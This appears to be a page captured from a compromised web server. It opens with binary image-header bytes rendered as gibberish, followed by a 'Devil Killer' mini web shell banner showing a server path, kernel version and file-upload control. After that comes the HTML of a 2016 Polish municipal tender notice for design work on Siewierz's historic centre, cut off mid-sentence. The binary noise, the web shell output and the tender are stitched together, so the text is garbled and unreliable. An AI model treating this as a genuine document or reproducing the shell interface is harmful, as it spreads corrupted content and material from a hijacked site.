JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160527/135786-N-2016.html

<p class="kh_header"><b>Siewierz: Opracowanie kompletnej dokumentacji projektowo - kosztorysowej dla rewitalizacji historycznego centrum Siewierza wraz z uzyskaniem ostatecznych decyzji o pozwoleniu na budowę lub innych ostatecznych decyzji lub braku sprzeciwu do zgłoszeń umożliwiających realizację inwestycji oraz sprawowaniem nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 135786 - 2016; data zamieszczenia: 27.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Siewierz , ul. Żwirki i Wigury 16, 42-470 Siewierz, woj. śląskie, tel. 0326499471, 6499400, faks 032 6499402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siewierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnej dokumentacji projektowo - kosztorysowej dla rewitalizacji historycznego centrum Siewierza wraz z uzyskaniem ostatecznych decyzji o pozwoleniu na budowę lub innych ostatecznych decyzji lub braku sprzeciwu do zgłoszeń umożliwiających realizację inwestycji oraz sprawowaniem nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje opracowanie szczegółowej i kompletnej dokumentacji budowlanej, wykonawczej i kosztorysowej wszystkich branż dla rewitalizacji historycznego centrum Siewierza poprzez budowę historycznego Traktu Księstwa Siewierskiego w obrębie średniowiecznego układu urbanistycznego łączącego Rynek w Siewierzu z Zamkiem Biskupów Krakowskich oraz dla przebudowy, rozbudowy i podwyższenia standardu przyległego układu drogowego, placów i parkingów, sieci napowietrznych i infrastruktury podziemnej, zagospodarowania terenu przyległego, budowy nowych elementów małej architektury i budowy docelowej organizacji ruchu drogowego wraz z uzyskaniem ostatecznych decyzji o pozwoleniu na budowę lub innych ostatecznych decyzji lub braku sprzeciwu do zgłoszeń umożliwiających realizację inwestycji oraz innych decyzji administracyjnych, pozwoleń, uzgodnień i warunków niezbędnych do prawidłowego wykonania przedmiotu zamówienia, a także sprawowaniem nadzoru autorskiego w trakcie realizacji inwestycji objętej projektem. Granice obszaru opracowania zostały zaznaczone na Załączniku graficznym stanowiącym załącznik do specyfikacji istotnych warunków zamówienia.
2.	Przedmiot zamówienia swoim zakresem obejmuje w szczególności: 
a)	Zaprojektowanie budowy historycznego Traktu Księstwa Siewierskiego łączącego Rynek w Siewierzu z Zamkiem Biskupów Krakowskich obejmującego łącznik od Rynku i ul. Krakowskiej do ul. Ludowej oraz ulicę Tadeusza Kościuszki do mostu przy Zamku. Należy przewidzieć konieczność poszerzenia układu drogowego na odcinku ulicy Tadeusz Kościuszki od skrzyżowania z ul. Czarnieckiego do mostu przy Zamku i przewidzieć dla tego odcinka procedurę uzyskania Zezwolenia na Realizację Inwestycji Drogowej i konieczność opracowania przez Wykonawcę map zawierających projektowane podziały nieruchomości oraz dokonanie czynności geodezyjnych w terenie i dopełnienie niezbędnych czynności formalno-prawnych dla wszystkich działek przewidzianych pod pasy drogowe w celu dokonania wpisów do ksiąg wieczystych i katastru nieruchomości.
b)	Zaprojektowanie przebudowy dróg na ulicach: Mikołaja Kopernika (od wylotu z Rynku do ul. Ludowej), Krótkiej, Wolności, Krakowskiej (od Rynku do mostu nad rzeką Przemszą), Ludowej oraz na ulicy łączącej Rynek z ul. Kopernika wraz ze skrzyżowaniami także z ulicami przyległymi (np. skrzyżowania z ul. Oleśnickiego, Stoczkową, Czarnieckiego itp.).
c)	Zaprojektowanie przebudowy i rozbudowy w szczególności następujących placów, skwerów i parkingów wraz z podbudowami: dużego parkingu przy Zamku w Siewierzu od strony ul. Krakowskiej z jego poszerzeniem także w stronę przyległych nieruchomości z uwzględnieniem zaprojektowania muru oporowego od strony tych nieruchomości oraz przebudowy i ujednolicenia ogrodzenia, placów, skwerów i parkingów zlokalizowanych wokół budynku Izby Tradycji i Kultury Dawnej w Siewierzu, przy Kościele św. Macieja Apostoła w Siewierzu ograniczonych ul. Ludową, wlotami z ul Kopernika, Krótkiej, Wolności 
i Czarnieckiego, wzdłuż ulicy Tadeusza Kościuszki od ul. Ludowej do Czarnieckiego (także parking i łącznik drogowy przy pawilonie handlowym), innych placów, zieleńców i skwerów występujących w granicach opracowania (np. przy skrzyżowaniu ulic Krakowskiej, Ludowej i Stoczkowej czy przy skrzyżowaniu ul. Kościuszki z drogą przy terenach rekreacyjnych i sportowych przy Zamku w Siewierzu) lub utworzonych w ramach projektu wynikających 
z propozycji projektanta, sugestii i wytycznych Zamawiającego.
d)	Zaprojektowanie przebudowy ciągu pieszo-rowerowego wokół Zamku w Siewierzu do parkingu wraz z energooszczędnym oświetleniem parkowym i małą architekturą.
e)	Zaprojektowanie w granicach opracowania nowych jezdni, chodników i zjazdów na posesje wraz z niezbędnymi podbudowami, częściowo z elementów granitowych lub innych materiałów o wysokim standardzie.
f)	Zaprojektowanie likwidacji starych i budowy nowych stylowych elementów małej architektury i zagospodarowania terenu i zieleni urządzonej w granicach opracowania wynikających z propozycji projektanta, sugestii i wytycznych Zamawiającego.
g)	Zaprojektowanie likwidacji starego i budowy nowego stylowego oświetlenia drogowego i parkowego w technologii LED, dedykowanego dla dróg, placów, parkingów i skwerów.
h)	Zaprojektowanie w porozumieniu z gestorami sieci przebudowy sieci napowietrznych i infrastruktury podziemnej w celu podwyższenia estetyki otoczenia, likwidacji sieci napowietrznych, likwidacji niepotrzebnych elementów infrastruktury, naprawy elementów infrastruktury nadziemnej i podziemnej, wymiany zużytych elementów oraz usunięcia kolizji. Powyższe dotyczy każdej występującej w granicach opracowania infrastruktury technicznej (w tym także wodnej, kanalizacyjnej, gazowej, elektroenergetycznej, teletechnicznej i innych).
i)	Zaprojektowanie budowy i przebudowy odwodnienia (w tym także kanalizacji deszczowej) dla wszystkich elementów w zakresie opracowania.
j)	Zaprojektowanie wymiany i przebudowy sieci wodociągowej.
k)	Zaprojektowanie kanału technologicznego na całym obszarze objętym projektem.
l)	Zaprojektowanie nowych toalet miejskich wraz z likwidacją istniejących przy parkingu przez Kościołem św. Macieja Apostoła oraz zaprojektowanie toalety przy parkingu obok kompleksu sportowo-rekreacyjnego przy Zamku w Siewierzu. 
m)	Zaprojektowanie docelowej organizacji ruchu drogowego dla zakresu objętego projektem.
n)	Wykonanie wizualizacji w aksonometrii.
3.	Przedmiot zamówienia swoim zakresem obejmuje także uzyskanie ostatecznych decyzji o pozwoleniu na budowę lub innych ostatecznych decyzji (w tym np. ZRID- u) lub braku sprzeciwu odpowiedniego organu do zgłoszeń realizacji robót budowlanych umożliwiających realizację inwestycji.
4.	Przedmiot zamówienia swoim zakresem obejmuje także sprawowanie nadzoru autorskiego w trakcie realizacji inwestycji objętej projektem a w szczególności: stwierdzanie w toku wykonywania robót budowlanych zgodności realizacji inwestycji z projektem, usuwanie wad i uszczegóławianie projektu technicznego w trakcie realizacji robót budowlanych na żądanie Zamawiającego, w terminie wskazanym przez Zamawiającego, uzgadnianie możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez Zamawiającego, udział w naradach technicznych,
 udział w odbiorze poszczególnych etapów robót budowlanych i w odbiorze końcowym, 
 zatwierdzenie dokumentacji powykonawczej uwzględniającej wszystkie zmiany wprowadzone do dokumentacji projektowej w trakcie realizacji inwestycji.
5.	Pozostałe warunki zlecenia:
a)	Wykonawca w niezbędnym zakresie zapewni wykonanie badań geologicznych i geotechnicznych celem oceny nośności gruntów i istniejącej podbudowy oraz zwierciadła wody gruntowej.
b)	Wykonawca w niezbędnym zakresie opracuje inwentaryzację drzew i krzewów przewidzianych do wycinki zgodnie z wytycznymi Zamawiającego.
c)	Jeżeli zajdzie konieczność uzyskania warunków podłączenia mediów lub zmiany warunków przyznanych to Wykonawca na mocy pełnomocnictwa uzyska te dokumenty i zaprojektuje odpowiednie przyłącza.
d)	W ramach przedmiotu zamówienia Wykonawca przed przystąpieniem do zaawansowanej fazy projektowej wykona szczegółową inwentaryzację budowlaną stanu dróg, placów, parkingów i skwerów, terenu przyległego i infrastruktury technicznej napowietrznej i podziemnej, oznakowania, elementów małej architektury i zagospodarowania terenu wraz z identyfikacją potrzeb dla dobudowy elementów, przebudowy lub rozbudowy elementów, prac remontowych, naprawczych i rozbiórkowych. Inwentaryzacja posłuży do prawidłowego zaprojektowania i skosztorysowania robót budowlanych oraz do identyfikacji potrzeb. Będzie dokumentem wyjściowym do wykonania koncepcji (wstępnego projektu) i przedstawienia jej Zamawiającemu do skonsultowania i zatwierdzenia celem przejścia do zaawansowanej fazy projektowej. Inwentaryzacja powinna zawierać w szczególności:
odwzorowanie na rysunkach szczegółowego stanu istniejącego, zwłaszcza elementów przewidzianych do likwidacji,
identyfikację wszelkich nieprawidłowości układu drogowego i oznakowania, uszkodzeń i nieprawidłowości infrastruktury technicznej napowietrznej i podziemnej, 
identyfikację nieczynnych i niepotrzebnych elementów infrastruktury technicznej i drogowej oraz małej architektury i zagospodarowania terenu i możliwości ich nowego ukształtowania,
identyfikację możliwości wprowadzenia nowych elementów jak wyżej oraz identyfikację możliwości likwidacji sieci napowietrznych i wprowadzenia ich do ziemi,
identyfikację potrzeb dla przebudowy z naciskiem na estetykę i dostosowanie funkcji i użyteczności do obowiązujących przepisów.
e)	W ramach przedmiotu zamówienia Wykonawca przed przystąpieniem do zaawansowanej fazy projektowej przedstawi Zamawiającemu wstępną koncepcję projektową i wizualizację do zatwierdzenia. Koncepcja oprócz wymogów Zamawiającego i identyfikacji potrzeb wynikających z inwentaryzacji stanu obiektu powinna zawierać także sugestie i opinie Wykonawcy wynikające z jego najlepszej wiedzy i doświadczenia. Wykonawca będzie zobowiązany do skonsultowania wstępnej koncepcji projektowej oraz wykonać dokumentację zgodnie z wytycznymi Zamawiającego. Zamawiający zaakceptuje wstępną koncepcję projektową bądź wniesie do niej uwagi w terminie nie przekraczającym 3 tygodni od doręczenia. 
W razie przekroczenia tego okresu, termin wykonania przedmiotu umowy zostanie przedłużony odpowiednio o okres zwłoki.
f)	Wykonawca będzie zobowiązany do współpracy z Zamawiającym w celu bezproblemowej realizacji zadania. Wykonawca jest zobowiązany do udziału 
w naradach koordynacyjnych w terminach uzgodnionych wspólnie z Zamawiającym oraz do raportowania Zamawiającemu postępu prac na każde wezwanie Zamawiającego.
g)	W rozwiązaniach projektowych należy wziąć również pod uwagę zastosowanie odpowiednich materiałów, aby nadać projektowanemu obszarowi stylową 
i zabytkową formę i charakter przy jednoczesnym zrównoważonym zastosowaniu nowoczesnych materiałów i urządzeń. Urządzenia, materiały i technologie muszą być dopuszczone do obrotu i powszechnego stosowania w budownictwie.
h)	W dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót oraz w przedmiarach robót niedopuszczalne jest używanie znaków towarowych 
i nazw producentów. Materiały należy wskazywać poprzez szczegółowe opisanie ich parametrów, bez określania konkretnej nazwy, w taki sposób by można było dokonać wyboru z co najmniej 3 producentów dostępnych na rynku.
6.	W ramach przedmiotu zamówienia Wykonawca wykona i dostarczy Zamawiającemu 
w szczególności:
a)	Mapę do celów projektowych,
b)	Uzgodnienia terenowo - prawne, uzgodnienia branżowe,
c)	Uzgodnienia ze Śląskim Wojewódzkim Konserwatorem Zabytków,
d)	Wypisy z rejestru gruntów,
e)	Decyzje o lokalizacji inwestycji celu publicznego,
f)	Inwentaryzację stanu istniejącego,
g)	Inwentaryzację drzew i zieleni do wycinki i zabezpieczenia,
h)	Badania geologiczne i geotechniczne,
i)	Wstępną koncepcję projektową z wizualizacją,
j)	Projekty budowlane wszystkich branż,
k)	Projekty wykonawcze wszystkich branż,
l)	Uzgodnioną i zatwierdzoną docelową organizację ruchu drogowego,
m)	Kosztorysy inwestorskie i przedmiary robót,
n)	Specyfikacje techniczne wykonania i odbioru robót budowlanych,
o)	Uzgodnienia, warunki, decyzje i pozwolenia niezbędne do prawidłowego wykonania przedmiotu zamówienia w tym także w razie konieczności: decyzje środowiskowe wraz z raportem o oddziaływaniu na środowisko, pozwolenia wodnoprawne wraz 
z operatami wodnoprawnymi, uzgodnienia z zarządcami sieci i dróg itp.,
p)	Ostateczne decyzje o pozwoleniu na budowę lub inne ostateczne decyzje (w tym np. Zezwolenia na Realizację Inwestycji Drogowej w razie konieczności) lub zgłoszenia wykonania robót budowlanych z brakiem sprzeciwu odpowiedniego organu do realizacji robót budowlanych umożliwiające realizację inwestycji.
q)	Inne niezbędne opracowania wynikłe w trakcie prac projektowych.
r)	Wszystkie inne opracowania niezbędne do prawidłowego i kompletnego wykonania zlecenia wynikających z przepisów prawa obowiązujących na każdym etapie trwania zleconych prac.
7.	Kompletna dokumentacja projektowa i inne niezbędne opracowania będą sporządzone i przekazane Zamawiającemu w 5 egzemplarzach. Kosztorys inwestorski będzie sporządzony w 6 egzemplarzach (3 w wersji uproszczonej i 3 w wersji szczegółowej). Dokumentacja projektowa, przedmiar robót, kosztorys inwestorski, specyfikacja techniczna wykonania i odbioru robót oraz inne opracowania stanowiące przedmiot zamówienia będą przekazane Zamawiającemu także w formie cyfrowej, a kosztorysy również w wersji edytowalnej.
8.	W przypadku konieczności uaktualnienia kosztorysów inwestorskich Wykonawca 
w terminie 7 dni, dostosuje je do aktualnej bazy cenowej na każde polecenie Zamawiającego. Wykonawca zobowiązany będzie dwa razy uaktualnić kosztorysy nieodpłatnie, każda kolejna aktualizacja będzie przedmiotem odrębnego zlecenia.
9.	Przedmiary i Kosztorysy Inwestorskie będą wykonane w podziale branżowym oraz obszarowym dla zakresów ustalonych przez Zamawiającego.
10.	Przedmiot zamówienia obejmuje również przekazanie praw autorskich w zakresie niniejszej dokumentacji projektowej, w tym praw autorskich zależnych oraz pełnienie nadzoru autorskiego podczas realizacji inwestycji na podstawie przedmiotowej dokumentacji projektowej.
11.	Dokumentację projektową należy przygotować również pod kątem zgodności 
z wymaganiami przepisów BHP i przeciwpożarowych, poprzez dostosowanie elementów tak, aby były zgodne z tymi przepisami oraz zaprojektowanie odpowiednich wymaganych oznakowań. 
12.	Przedmiot zamówienia w tym kosztorys inwestorski należy sporządzić zgodnie 
z aktualnym stanem prawnym
13.	Wykonawca wykona wszystkie inne opracowania niezbędne do prawidłowego i kompletnego wykonania zlecenia wynikające z przepisów prawa obowiązujących na każdym etapie trwania zleconych prac i uzyska niezbędne opinie, uzgodnienia i decyzje.
14.	Wykonawca po uzyskaniu mapy do celów projektowych a przed przystąpieniem do projektowania przeprowadzi konsultacje z właścicielami nieruchomości przyległych do projektowanego układu drogowego oraz z właściwymi zarządcami sieci, dróg, cieków 
i odbiorników wodnych, rowów i urządzeń melioracyjnych itp.  
15.	Wykonawca zaprojektuje likwidację wszelkich sieci napowietrznych w uzgodnieniu 
z zarządcami tych sieci, właścicielami nieruchomości przyległych do projektowanego układu drogowego i Zamawiającym lub w przypadku, gdy likwidacja sieci napowietrznych będzie niemożliwa zaprojektuje przesunięcie istniejących słupów teletechnicznych i energetycznych tak, aby dostosować ich lokalizację do zmienionego układu drogowego. Wykonawca zaprojektuje niezależne oświetlenie drogi w technologii LED lub innej energooszczędnej. Priorytetem dla Zamawiającego jest likwidacja wszelkich sieci napowietrznych. 
16.	W celu skoordynowania projektu drogi z zamierzeniami zarządców sieci: gazowej, wodociągowej, melioracyjnej, energetycznej, telekomunikacyjnej i innych Wykonawca uzyska niezbędne uzgodnienia i opinie w tym zakresie.
17.	Zamawiający planuje pozyskać dofinansowanie dla realizacji zadania objętego dokumentacją stanowiącą przedmiot zamówienia, ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego WSl 2014-2020.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość  udzielenia wybranemu wykonawcy,  w okresie 3 lat od udzielenia zgodnie z art. 67 ust. 1 pkt. 6 niniejszego zamówienia publicznego zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości niniejszego zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca zobowiązany jest do wniesienia przed upływem terminu do składania ofert wadium w wysokości 3 000 zł. (Słownie: trzy tysiące złotych). 
2.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
a) 	pieniądzu;
b) 	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) 	gwarancjach bankowych; 
d) 	gwarancjach ubezpieczeniowych;
e) 	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.)
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: ING Bank Śląski S.A. Oddział w Częstochowie Nr: 04 1050 1142 1000 0023 4376 3799 z dopiskiem wadium. 
4.	Dla Zamawiającego dokumentem potwierdzającym dokonania wpłaty wadium jest uznanie kwoty wadium na rachunku Zamawiającego (wpływ środków na rachunek Zamawiającego). Za skuteczność operacji finansowo - bankowych odpowiada Wykonawca.
5.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6.	Wadium wniesione w formie niepieniężnej należy zdeponować w Urzędzie Miasta 
i Gminy Siewierz pok. nr 17 za potwierdzeniem odbioru w terminie nie późniejszym niż termin składania ofert. 
7.	Wadium wniesione w formie gwarancji ubezpieczeniowej lub bankowej będzie akceptowane pod warunkiem:
a)	gwarancja będzie zawierała wszystkie przypadki utraty wadium przez Wykonawcę określone w art. 46 ust. 4a oraz ust. 5 Ustawy Prawo zamówień publicznych,
b)	okres ważności gwarancji będzie nie krótszy niż okres związania z ofertą określony 
w SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej dwa  projekty budowy, rozbudowy, przebudowy lub remontu drogi o długości minimum 900 m każda.  
Na potwierdzenie powyższego warunku Zamawiający żąda:
a)	Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, wg załącznika nr 4, oraz załączeniem:
b)	Dowodów, czy usługi zostały wykonane lub są wykonywane należycie. 
Uwagi:
1.	Zgodnie z Rozporządzeniem Prezesa rady Ministrów z  dnia 19 lutego 2013 r. 
w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane za dowody, o których mowa 
w pkt. b uznaje się:
a)	poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, 
b)	oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
2.	W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane 
w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów,  o których mowa w uwadze nr 1.  
3.	W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa w pkt b) budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były wykonane o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału 
w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować co najmniej:
a)	jednym projektantem posiadającym uprawnienia do projektowania bez ograniczeń 
w specjalności inżynieryjnej branży drogowej albo w specjalności konstrukcyjno-budowlanej uprawniającej do projektowania dróg lub odpowiadające im inne, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
b)	jednym projektantem posiadającym uprawnienia do projektowania bez ograniczeń 
